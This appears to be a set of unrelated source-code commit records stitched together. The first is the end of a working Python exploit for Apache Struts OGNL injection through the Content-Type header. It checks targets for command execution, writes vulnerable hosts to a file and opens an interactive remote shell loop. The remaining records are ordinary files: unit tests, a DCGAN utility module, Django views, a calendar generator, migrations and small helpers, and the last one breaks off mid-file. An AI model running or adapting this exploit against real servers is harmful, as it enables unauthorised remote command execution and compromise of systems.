exploit = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit
print BOLD+" [+] EXECUTION..."+ENDC
time.sleep(1)
for valida in validador():
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit(str(valida))})
result = urllib2.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1:
print RED+" [!] Vulnerable "+ENDC
owned = open('ListVulnStrutsFinal.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = raw_input(YELLOW+" [-] RUN EXPLOIT (y/n): "+ENDC)
if opcion == 'y':
cls()
while 1:
try:
separador = raw_input(GREEN+"\nroot@Shell:$ "+ENDC)
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit(str(separador))})
result = urllib2.urlopen(req).read()
print result
except:
sys.exit(0)
print BLUE+"\n BYE \n"+ENDC
else:
sys.exit(0)
print BLUE+"\n BYE \n"+ENDC
else:
time.sleep(1)
print GREEN+" [!] Not Vulnerable"+ENDC
print BLUE+"\n BYE \n"+ENDC
sys.exit(0)
else:
print " You must enter a URL.\n"
sys.exit(0)
| mit | Python | |
a45b62ab76324db2ae4a0842b901fec8e463e2f0 | Add tests for the constructor | ppb/ppb-vector,ppb/ppb-vector | tests/test_vector2_ctor.py | tests/test_vector2_ctor.py | import pytest # type: ignore
from hypothesis import given
from utils import floats, vectors, vector_likes
from ppb_vector import Vector2
class V(Vector2): pass
@pytest.mark.parametrize('cls', [Vector2, V])
@given(x=vectors())
def test_ctor_vector_like(cls, x: Vector2):
for x_like in vector_likes(x):
vector = cls(x_like)
assert vector == x == x_like
assert isinstance(vector, cls)
@pytest.mark.parametrize('cls', [Vector2, V])
@given(x=floats(), y=floats())
def test_ctor_coordinates(cls, x: float, y: float):
assert cls(x, y) == cls((x, y))
| artistic-2.0 | Python | |
221621e88496805fbee7849e376cce40e0d45f03 | Add test for #305 (thanks to @bfredl) | jriehl/numba,IntelLabs/numba,numba/numba,GaZ3ll3/numba,seibert/numba,jriehl/numba,pombredanne/numba,pitrou/numba,stuartarchibald/numba,gdementen/numba,ssarangi/numba,GaZ3ll3/numba,numba/numba,gdementen/numba,GaZ3ll3/numba,IntelLabs/numba,ssarangi/numba,stuartarchibald/numba,pitrou/numba,cpcloud/numba,pombredanne/numba,stefanseefeld/numba,gmarkall/numba,pombredanne/numba,sklam/numba,gmarkall/numba,seibert/numba,gdementen/numba,stefanseefeld/numba,pitrou/numba,gdementen/numba,stuartarchibald/numba,ssarangi/numba,sklam/numba,pombredanne/numba,gdementen/numba,sklam/numba,jriehl/numba,seibert/numba,gmarkall/numba,GaZ3ll3/numba,cpcloud/numba,sklam/numba,numba/numba,stonebig/numba,seibert/numba,cpcloud/numba,pitrou/numba,IntelLabs/numba,stuartarchibald/numba,gmarkall/numba,GaZ3ll3/numba,stuartarchibald/numba,sklam/numba,numba/numba,seibert/numba,pombredanne/numba,stefanseefeld/numba,stonebig/numba,cpcloud/numba,numba/numba,jriehl/numba,IntelLabs/numba,pitrou/numba,IntelLabs/numba,stonebig/numba,cpcloud/numba,stefanseefeld/numba,ssarangi/numba,gmarkall/numba,stonebig/numba,jriehl/numba,stefanseefeld/numba,ssarangi/numba,stonebig/numba | numba/tests/issues/test_issue_305.py | numba/tests/issues/test_issue_305.py | from __future__ import print_function, division, absolute_import
import tempfile
import textwrap
from numba import jit, autojit
# Thanks to @bfredl
def test_fetch_latest_source():
"""
When reloading new versions of the same module into the same session (i.e.
an interactive ipython session), numba sometimes gets the wrong version of
the source from inspect.getsource()
"""
f = tempfile.NamedTemporaryFile()
fn = f.name
# fn = "/tmp/numbatest.py"
f.write(textwrap.dedent("""
@jit('i8()')
def test():
return 0
"""))
f.flush()
exec open(fn)
f.write(textwrap.dedent("""
@jit('i8()')
def test():
return 1
"""))
f.flush()
exec open(fn)
assert test() == test.py_func() # gives 0 == 1
def test_no_auto_reload():
"""
In this case autojit 'sees' the new version of the source even if it
hasn't been reloaded. This could be fixed by fetching the ast directly
at declaration time rather that at first compilation (2nd commit)
"""
f = tempfile.NamedTemporaryFile()
fn = f.name
f.write(textwrap.dedent("""
@autojit
def test2():
return 0
"""))
f.flush()
exec open(fn)
f.write(textwrap.dedent("""
@autojit
def test2():
return 1
"""))
f.flush()
# note that we don't reexec the file
assert test2() == test2.py_func() # gives 1 == 0
test_fetch_latest_source()
test_no_auto_reload() | bsd-2-clause | Python | |
618340e7dfd21c54ac713140079c53b205aae73e | Create tuples.py | JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking | hacker_rank/python/basic_data_types/tuples.py | hacker_rank/python/basic_data_types/tuples.py | if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t = (tuple(integer_list))
print(hash(t))
| mit | Python | |
d3b99620a4794376f4319516af65aa0f5c433354 | Create really terrible demo | Zirientis/skulpt-canvas,Zirientis/skulpt-canvas | demo.py | demo.py | import document
pre = document.getElementById('edoutput')
pre.innerHTML = '''
<button onclick="var a=new XMLHttpRequest();a.open('GET','https://raw.githubusercontent.com/Zirientis/skulpt-canvas/master/core.js', false);a.send();console.log(a.response);">Run</button>
<span id="evaltext" style="display:none">
</span>
'''
# Put Python<->JS class here.
class FakeCanvas:
def fillRect(self, x, y, width, height):
pass
| mit | Python | |
6af0081721acd4b6258b97c02424b2ccba80a303 | Create scale.py | cuongnb14/lab_clound_computing,huanpc/lab_cloud_computing | docs/learning-by-doing/week06-mesos-and-marathon/scale.py | docs/learning-by-doing/week06-mesos-and-marathon/scale.py | import http.client
import json
URI = 'localhost:8080'
header = {'Content-type': 'application/json'}
data = '"instances": "3"'
json_data = json.dumps(data)
method = 'PUT'
link = '/v2/apps/basic-0?force=true'
con = http.client.HTTPConnection(URI)
con.request(method,link,json_data,header)
response = con.getresponse()
print(response.read().decode())
| apache-2.0 | Python | |
93a2c523383fd1903e2912c783efdd1d27dc81ee | add tests for inserting rows with missing key columns | scylladb/scylla,scylladb/scylla,scylladb/scylla,scylladb/scylla | test/cql-pytest/test_null.py | test/cql-pytest/test_null.py | # Copyright 2020 ScyllaDB
#
# This file is part of Scylla.
#
# Scylla is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Scylla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Scylla. If not, see <http://www.gnu.org/licenses/>.
#############################################################################
# Tests for finer points of the meaning of "null" in various places
#############################################################################
import pytest
import re
from cassandra.protocol import SyntaxException, AlreadyExists, InvalidRequest, ConfigurationException, ReadFailure
from util import unique_name, random_string
@pytest.fixture(scope="session")
def table1(cql, test_keyspace):
table = test_keyspace + "." + unique_name()
cql.execute(f"CREATE TABLE {table} (p text, c text, v text, primary key (p, c))")
yield table
cql.execute("DROP TABLE " + table)
# An item cannot be inserted without a key. Verify that before we get into
# the really interesting test below - trying to pass "null" as the value of
# the key.
# See also issue #3665.
def test_insert_missing_key(cql, table1):
s = random_string()
# A clustering key is missing. Cassandra uses the message "Some clustering
# keys are missing: c", and Scylla: "Missing mandatory PRIMARY KEY part c"
with pytest.raises(InvalidRequest, match=re.compile('missing', re.IGNORECASE)):
cql.execute(f"INSERT INTO {table1} (p) VALUES ('{s}')")
# Similarly, a missing partition key
with pytest.raises(InvalidRequest, match=re.compile('missing', re.IGNORECASE)):
cql.execute(f"INSERT INTO {table1} (c) VALUES ('{s}')")
# A null key, like a missing one, is also not allowed.
# This reproduces issue #7852.
@pytest.mark.xfail(reason="issue #7852")
def test_insert_null_key(cql, table1):
s = random_string()
with pytest.raises(InvalidRequest, match='null value'):
cql.execute(f"INSERT INTO {table1} (p,c) VALUES ('{s}', null)")
with pytest.raises(InvalidRequest, match='null value'):
cql.execute(f"INSERT INTO {table1} (p,c) VALUES (null, '{s}')")
# Try the same thing with prepared statement, where a "None" stands for
# a null. Note that this is completely different from UNSET_VALUE - only
# with the latter should the insertion be ignored.
stmt = cql.prepare(f"INSERT INTO {table1} (p,c) VALUES (?, ?)")
with pytest.raises(InvalidRequest, match='null value'):
cql.execute(stmt, [s, None])
with pytest.raises(InvalidRequest, match='null value'):
cql.execute(stmt, [None, s])
| agpl-3.0 | Python | |
2b095ad646f1e8d4280190c9a1c2ccbed512d43c | Create __init__.py | PyThaiNLP/pythainlp | pythainlp/romanization/__init__.py | pythainlp/romanization/__init__.py | from pythainlp.romanization.royin import *
| apache-2.0 | Python | |
2ce83fbdef3a139dfb5618e9dc7fde4f2c8249ec | add method params. | merlian/django-xadmin,f1aky/xadmin,huaishan/django-xadmin,ly0/xxadmin,merlian/django-xadmin,Keleir/django-xadmin,cgcgbcbc/django-xadmin,zhiqiangYang/django-xadmin,hochanh/django-xadmin,hochanh/django-xadmin,tvrcopgg/edm_xadmin,cgcgbcbc/django-xadmin,wbcyclist/django-xadmin,sshwsfc/django-xadmin,sshwsfc/xadmin,vincent-fei/django-xadmin,t0nyren/django-xadmin,sshwsfc/django-xadmin,jneight/django-xadmin,vincent-fei/django-xadmin,marguslaak/django-xadmin,Keleir/django-xadmin,sshwsfc/xadmin,alexsilva/django-xadmin,cgcgbcbc/django-xadmin,pobear/django-xadmin,Keleir/django-xadmin,zhiqiangYang/django-xadmin,taxido/django-xadmin,merlian/django-xadmin,tvrcopgg/edm_xadmin,zhiqiangYang/django-xadmin,alexsilva/django-xadmin,t0nyren/django-xadmin,jneight/django-xadmin,cupen/django-xadmin,AndyHelix/django-xadmin,marguslaak/django-xadmin,taxido/django-xadmin,hochanh/django-xadmin,sshwsfc/xadmin,Keleir/django-xadmin,AndyHelix/django-xadmin,pobear/django-xadmin,iedparis8/django-xadmin,zhiqiangYang/django-xadmin,pobear/django-xadmin,jeanmask/opps-admin,hochanh/django-xadmin,tvrcopgg/edm_xadmin,ly0/xxadmin,tvrcopgg/edm_xadmin,vincent-fei/django-xadmin,marguslaak/django-xadmin,cupen/django-xadmin,vincent-fei/django-xadmin,pobear/django-xadmin,cupen/django-xadmin,sshwsfc/django-xadmin,AndyHelix/django-xadmin,huaishan/django-xadmin,t0nyren/django-xadmin,marguslaak/django-xadmin,cupen/django-xadmin,f1aky/xadmin,iedparis8/django-xadmin,huaishan/django-xadmin,taxido/django-xadmin,t0nyren/django-xadmin,sshwsfc/django-xadmin,alexsilva/django-xadmin,wbcyclist/django-xadmin,huaishan/django-xadmin,iedparis8/django-xadmin,merlian/django-xadmin,wbcyclist/django-xadmin,jneight/django-xadmin,ly0/xxadmin,taxido/django-xadmin,AndyHelix/django-xadmin,f1aky/xadmin,ly0/xxadmin,f1aky/xadmin,sshwsfc/xadmin,alexsilva/django-xadmin | exadmin/views/website.py | exadmin/views/website.py | from django.utils.translation import ugettext as _
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.views.decorators.cache import never_cache
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from django.http import HttpResponse
from base import BaseAdminView
from dashboard import Dashboard
from exadmin.forms import AdminAuthenticationForm
from exadmin.models import UserSettings
class IndexView(Dashboard):
title = "Main Dashboard"
class UserSettingView(BaseAdminView):
@never_cache
def post(self, request):
key = request.POST['key']
val = request.POST['value']
us, created = UserSettings.objects.get_or_create(user=self.user, key=key)
us.value = val
us.save()
return HttpResponse('')
class LoginView(BaseAdminView):
@never_cache
def get(self, request, *args, **kwargs):
context = self.get_context()
context.update({
'title': _('Log in'),
'app_path': request.get_full_path(),
REDIRECT_FIELD_NAME: request.get_full_path(),
})
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
'authentication_form': AdminAuthenticationForm,
'template_name': 'admin/login.html',
}
return login(request, **defaults)
@never_cache
def post(self, request, *args, **kwargs):
return self.get(request)
class LogoutView(BaseAdminView):
logout_template = None
@never_cache
def get(self, request, *args, **kwargs):
context = self.get_context()
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
return logout(request, **defaults)
@never_cache
def post(self, request, *args, **kwargs):
return self.get(request)
| from django.utils.translation import ugettext as _
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.views.decorators.cache import never_cache
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from django.http import HttpResponse
from base import BaseAdminView
from dashboard import Dashboard
from exadmin.forms import AdminAuthenticationForm
from exadmin.models import UserSettings
class IndexView(Dashboard):
title = "Main Dashboard"
class UserSettingView(BaseAdminView):
@never_cache
def post(self, request):
key = request.POST['key']
val = request.POST['value']
us, created = UserSettings.objects.get_or_create(user=self.user, key=key)
us.value = val
us.save()
return HttpResponse('')
class LoginView(BaseAdminView):
@never_cache
def get(self, request):
context = self.get_context()
context.update({
'title': _('Log in'),
'app_path': request.get_full_path(),
REDIRECT_FIELD_NAME: request.get_full_path(),
})
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
'authentication_form': AdminAuthenticationForm,
'template_name': 'admin/login.html',
}
return login(request, **defaults)
@never_cache
def post(self, request):
return self.get(request)
class LogoutView(BaseAdminView):
logout_template = None
@never_cache
def get(self, request):
context = self.get_context()
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
return logout(request, **defaults)
@never_cache
def post(self, request):
return self.get(request)
| bsd-3-clause | Python |
3419aa3dc2d14718c050e17f6ecc1a76844b5d26 | Add sfirah generator | cheshirex/shul-calendar,cheshirex/shul-calendar | sfirah.py | sfirah.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import hebcalendar
import sys
import codecs
import uuid
numbers = ['', u'אחד', u'שנים', u'שלושה', u'ארבעה', u'חמשה', u'ששה', u'שבעה', u'שמונה', u'תשעה']
numbersTen = ['', u'עשר', u'עשרים', u'שלושים', u'ארבעים']
def getSfirahText(day):
text = u"בָּרוּךְ אַתָּה ה' אֱלהֵינוּ מֶלֶךְ הָעולָם, אֲשֶׁר קִדְּשָׁנוּ בְּמִצְותָיו וְצִוָּנוּ עַל סְפִירַת הָעומֶר"
text += u'\\n'
if day == 1:
text += u'היום יום אחד בעומר'
elif day == 2:
text += u'היום שני ימים בעומר'
elif day == 10:
text += u'היום עשרה ימים, שהם שבוע אחד ושלשה ימים בעומר'
else:
text += u'היום '
text += numbers[day % 10]
if day % 10 and day > 20:
text += u' ו'
if day > 10:
if day < 20:
text += u' '
text += numbersTen[day / 10]
text += u' יום'
else:
text += u' ימים'
if day >= 7:
text += u', שהם '
if day / 7 == 1:
text += u'שבוע אחד'
elif day / 7 == 2:
text += u'שני שבועות'
else:
text += numbers[day / 7]
text += u' שבועות'
if day % 7 == 1:
text += u' ויום אחד'
elif day % 7 == 2:
text += u' ושני ימים'
elif day % 7:
text += u' ו'
text += numbers[day % 7]
text += u' ימים'
text += u' בעומר'
text += u'\\n'
text += u"הָרַחֲמָן, הוּא יַחֲזִיר לָנוּ עֲבודַת בֵּית הַמִּקְדָּשׁ לִמְקומָהּ בִּמְהֵרָה בְּיָמֵינוּ, אָמֵן סֶלָה"
return text
myUuid = uuid.UUID('{023e9cde-ab09-4611-a43f-dac7b1ce77b3}')
def usage():
print 'sfirah.py Sfirah calendar Generation script'
print 'Usage: sfirah.py <Jewish year>'
if len(sys.argv) != 2:
usage()
sys.exit(1)
year = int(sys.argv[1])
hebcalendar.setFilter(['omer'])
sfirah = hebcalendar.getYear(year, 'Israel')
out = codecs.open('sfirahFor%d.ics' % year, 'w', encoding='utf-8')
out.write('BEGIN:VCALENDAR\r\n')
out.write('VERSION:2.0\r\n')
out.write('PRODID:sfirahCalendarGenerator_by_Daniel_Bernstein\r\n')
dayCounter = 1
for day in sorted(sfirah):
date = sfirah[day]
greg = '%04d%02d%02d' % date['gregorian']
out.write('BEGIN:VEVENT\r\n')
out.write('UID:%s\r\n' % uuid.uuid3(myUuid, '%d' % dayCounter).hex)
timestamp = ':%sT000000' % greg
out.write('DTSTART%s\r\n' % timestamp)
out.write('DTEND%s\r\n' % timestamp)
out.write(u'SUMMARY:ספירת העומר\r\n')
text = getSfirahText(dayCounter)
out.write('DESCRIPTION:%s\r\n' % text)
out.write('BEGIN:VALARM\r\n')
out.write('TRIGGER:-PT210M\r\n')
out.write('ACTION:DISPLAY\r\n')
out.write('DESCRIPTION:%s\r\n' % text)
out.write('END:VALARM\r\n')
out.write('END:VEVENT\r\n')
dayCounter += 1
out.write('END:VCALENDAR\r\n')
out.close() | mit | Python | |
807a87ef5bfe1f34a072e3de0e1d60c07cefb5fb | Add test_pypy | naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode | unnaturalcode/test_pypy.py | unnaturalcode/test_pypy.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_pypy_syntax import checkPyPySyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """if(true)):
print ("I am correct")
"""
class TestStringMethods(unittest.TestCase):
def test_syntax_ok(self):
toTest = checkPyPySyntax('a=1+2')
self.assertTrue(toTest is None)
def test_syntax_error(self):
toTest = checkPyPySyntax(ERROR_TEST)
self.assertTrue(isinstance (toTest[0], CompileError))
self.assertEqual(toTest[0].filename, 'toCheck.py'.encode())
self.assertEqual(toTest[0].line, 1)
self.assertEqual(toTest[0].column, None)
self.assertEqual(toTest[0].functionname, None)
self.assertEqual(toTest[0].text, 'unmatched \')\':if(true)):'.encode())
self.assertEqual(toTest[0].errorname, 'SyntaxError'.encode())
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | Python | |
4e0f9d8630847c92f02b0481fc0770cec68dadf7 | Implement auth tests | messente/verigator-python | messente/verigator/test/test_auth.py | messente/verigator/test/test_auth.py | from unittest import TestCase
from mock import MagicMock
from messente.verigator.client import RestClient
from messente.verigator.controllers import Auth
from verigator import routes
# noinspection PyUnresolvedReferences
class TestAuth(TestCase):
def setUp(self):
self.client = RestClient("http://test", "test", "test")
self.auth = Auth(self.client)
self.sms_init_response = {
"method": "sms",
"auth_id": "auth_id"
}
self.totp_init_response = {
"method": "totp"
}
self.verified_response = {
"verified": True
}
self.failed_response = {
"verified": False,
"status": {
"throttled": False,
"expired": False,
"invalid": True,
"result": "INVALID"
},
}
def test_initiate_sms(self):
self.client.post = MagicMock(return_value=self.sms_init_response)
res = self.auth.initiate("sid", "uid", self.auth.METHOD_SMS)
self.client.post.assert_called_with(routes.AUTH_INITIATE.format("sid", "uid"),
json={"method": "sms"})
self.assertEqual(res, self.sms_init_response['auth_id'])
def test_initiate_totp(self):
self.client.post = MagicMock(return_value=self.totp_init_response)
res = self.auth.initiate("sid", "uid", self.auth.METHOD_TOTP)
self.client.post.assert_called_with(routes.AUTH_INITIATE.format("sid", "uid"),
json={"method": "totp"})
self.assertIsNone(res)
def test_verify_sms(self):
self.client.put = MagicMock(return_value=self.verified_response)
verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_SMS, "token", "auth_id")
self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
json={"method": "sms", "token": "token", "auth_id": "auth_id"})
self.assertTrue(verified)
def test_verify_totp(self):
self.client.put = MagicMock(return_value=self.verified_response)
verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_TOTP, "token")
self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
json={"method": "totp", "token": "token"})
self.assertTrue(verified)
def test_verify_failed(self):
self.client.put = MagicMock(return_value=self.failed_response)
verified, error = self.auth.verify("sid", "uid", self.auth.METHOD_TOTP, "token")
self.client.put.assert_called_with(routes.AUTH_VERIFY.format("sid", "uid"),
json={"method": "totp", "token": "token"})
self.assertFalse(verified)
| apache-2.0 | Python | |
3d32b633904316b077c5d3c3b3444154785f9fd3 | Create utils.py | ChunML/DCGAN | utils.py | utils.py | import math
import numpy as np
import tensorflow as tf
import scipy
from tensorflow.python.framework import ops
image_summary = tf.summary.image
scalar_summary = tf.summary.scalar
histogram_summary = tf.summary.histogram
merge_summary = tf.summary.merge
SummaryWriter = tf.summary.FileWriter
class batch_norm(object):
def __init__(self, epsilon=1e-5, momentum=0.9, name='batch_norm'):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.name = name
def __call__(self, x, train=True):
return tf.contrib.layers.batch_norm(x,
decay=self.momentum,
updates_collections=None,
epsilon=self.epsilon,
scale=True,
is_training=train,
scope=self.name)
def conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name='conv2d'):
with tf.variable_scope(name):
w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.))
conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())
return conv
def deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name='deconv2d', with_w=False):
with tf.variable_scope(name):
w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],
initializer=tf.random_normal_initializer(stddev=stddev))
deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.))
deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
if with_w:
return deconv, w, biases
else:
return deconv
def lrelu(x, leak=0.2, name='lrelu'):
return tf.maximum(x, leak*x)
def linear(input_, output_size, scope=None, stddev=0.02, bias_start=0., with_w=False):
shape = input_.get_shape().as_list()
with tf.variable_scope(scope or 'Linear'):
matrix = tf.get_variable('Matrix', [shape[1], output_size], tf.float32, tf.random_normal_initializer(stddev=stddev))
bias = tf.get_variable('bias', [output_size], initializer=tf.constant_initializer(bias_start))
if with_w:
return tf.matmul(input_, matrix) + bias, matrix, bias
else:
return tf.matmul(input_, matrix) + bias
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def inverse_transform(images):
return (images+1.)/2.
def imsave(images, size, path):
image = np.squeeze(merge(images, size))
return scipy.misc.imsave(path, image)
def merge(images, size):
h, w = images.shape[1], images.shape[2]
if (images.shape[3] in (3, 4)):
c = images.shape[3]
img = np.zeros((h*size[0], w*size[1], c))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j*h:(j+1)*h, i*w:(i+1)*w, :] = image
return img
elif images.shape[3] == 1:
img = np.zeros((h*size[0], w*size[1]))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j*h:(j+1)*h, i*w:(i+1)*w] = image[:, :, 0]
return img
| mit | Python | |
464d55d687a664a5ed7da4f7ddafce1f647d5efc | add templation url.templation_static to manage statics in dev stage | qdqmedia/django-templation,qdqmedia/django-templation,qdqmedia/django-templation | templation/urls.py | templation/urls.py | from django.conf.urls import patterns, url
from .settings import DAV_ROOT, DAV_STATIC_URL
from .views import static_view
def templation_static(**kwargs):
"""
Helper function to return a URL pattern for serving files in debug mode.
Mostly cloned from django.conf.urls.static function.
from templation.urls import templation_static
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + templation_static(**kwargs)
"""
kwargs.update({
'document_root': DAV_ROOT
})
return patterns('',
url(r'{}/(?P<resource_id>.*)/(?P<path>.*)$'.format(DAV_STATIC_URL.lstrip('/')),
static_view, kwargs=kwargs),
) | bsd-3-clause | Python | |
89daaaf631258595577dfc1c24dfdde8425f9efc | add migration | neynt/tsundiary,neynt/tsundiary,neynt/tsundiary,neynt/tsundiary | migrations/versions/2d696cdd68df_.py | migrations/versions/2d696cdd68df_.py | """empty message
Revision ID: 2d696cdd68df
Revises: 388d0cc48e7c
Create Date: 2014-11-14 00:27:32.062569
"""
# revision identifiers, used by Alembic.
revision = '2d696cdd68df'
down_revision = '388d0cc48e7c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
| mit | Python | |
c779a68f1cf97693e09f116237c38efa1d791186 | add a module working with http connections | alces/gitlab-rest-client | http.py | http.py | '''
working with HTTP requests & responces
'''
import config
import httplib
import urlparse
'''
make a connection to URL
'''
def mkConn(url):
pars = urlparse.urlparse(url)
conCls = pars.scheme == 'https' and httplib.HTTPSConnection or httplib.HTTPConnection
return conCls(pars.netloc)
'''
send request to a system and return a response
'''
def sendReq(nam, path, meth = 'GET', body = ''):
url = config.getURL(nam)
cn = mkConn(url)
cn.request(meth, '%s/api/v3/%s' % (url, path), body, {
'PRIVATE-TOKEN': config.getToken(nam)
})
return cn.getresponse()
| bsd-2-clause | Python | |
bcd2cdae3176dddca06b0e09774b7c9cd641ce7b | Define custom exceptions | footynews/fn_backend | aggregator/exceptions.py | aggregator/exceptions.py |
class WebCrawlException(Exception):
pass
class AuthorNotFoundException(WebCrawlException):
pass
class DatePublishedNotFoundException(WebCrawlException):
pass
class TitleNotFoundException(WebCrawlException):
pass
| apache-2.0 | Python | |
06dbbfd7a8876f7db14f80e13d45eacd369501ab | add SocketServer | aamalev/aioworkers,aioworkers/aioworkers | aioworkers/net/server.py | aioworkers/net/server.py | import socket
from ..core.base import LoggingEntity
class SocketServer(LoggingEntity):
def __init__(self, *args, **kwargs):
self._sockets = []
super().__init__(*args, **kwargs)
def set_config(self, config):
super().set_config(config)
port = self.config.get_int('port', null=True)
if port:
host = self.config.get('host')
self._sockets.append(self.bind(port, host))
def bind(self, port, host=None, backlog=128):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
host = host or '0.0.0.0'
self.logger.info('Bind to %s:%s', host, port)
sock.bind((host, port))
sock.setblocking(False)
sock.listen(backlog)
return sock
| apache-2.0 | Python | |
de250e5e63e4b0a36d06f8187644f91157265218 | Remove Privacy stubs | harry-7/Plinth,kkampardi/Plinth,vignanl/Plinth,harry-7/Plinth,jvalleroy/plinth-debian,freedomboxtwh/Plinth,freedomboxtwh/Plinth,harry-7/Plinth,kkampardi/Plinth,harry-7/Plinth,freedomboxtwh/Plinth,jvalleroy/plinth-debian,jvalleroy/plinth-debian,vignanl/Plinth,vignanl/Plinth,jvalleroy/plinth-debian,harry-7/Plinth,vignanl/Plinth,jvalleroy/plinth-debian,vignanl/Plinth,kkampardi/Plinth,freedomboxtwh/Plinth,kkampardi/Plinth,kkampardi/Plinth,freedomboxtwh/Plinth | modules/installed/privacy/privacy.py | modules/installed/privacy/privacy.py | import cherrypy
from gettext import gettext as _
from plugin_mount import PagePlugin
from modules.auth import require
import cfg
import util
class Privacy(PagePlugin):
order = 20 # order of running init in PagePlugins
def __init__(self, *args, **kwargs):
PagePlugin.__init__(self, *args, **kwargs)
self.register_page("privacy")
self.menu = cfg.main_menu.add_item("Privacy", "icon-eye-open", "/privacy", 12)
@cherrypy.expose
def index(self):
return util.render_template(template='privacy_config',
title=_('Privacy Control Panel'))
| import cherrypy
from gettext import gettext as _
from plugin_mount import PagePlugin
from modules.auth import require
import cfg
import util
class Privacy(PagePlugin):
order = 20 # order of running init in PagePlugins
def __init__(self, *args, **kwargs):
PagePlugin.__init__(self, *args, **kwargs)
self.register_page("privacy")
self.menu = cfg.main_menu.add_item("Privacy", "icon-eye-open", "/privacy", 12)
self.menu.add_item("General Config", "icon-asterisk", "/privacy/config", 10)
self.menu.add_item("Ad Blocking", "icon-ban-circle", "/privacy/adblock", 20)
self.menu.add_item("HTTPS Everywhere", "icon-lock", "/privacy/https_everywhere", 30)
@cherrypy.expose
def index(self):
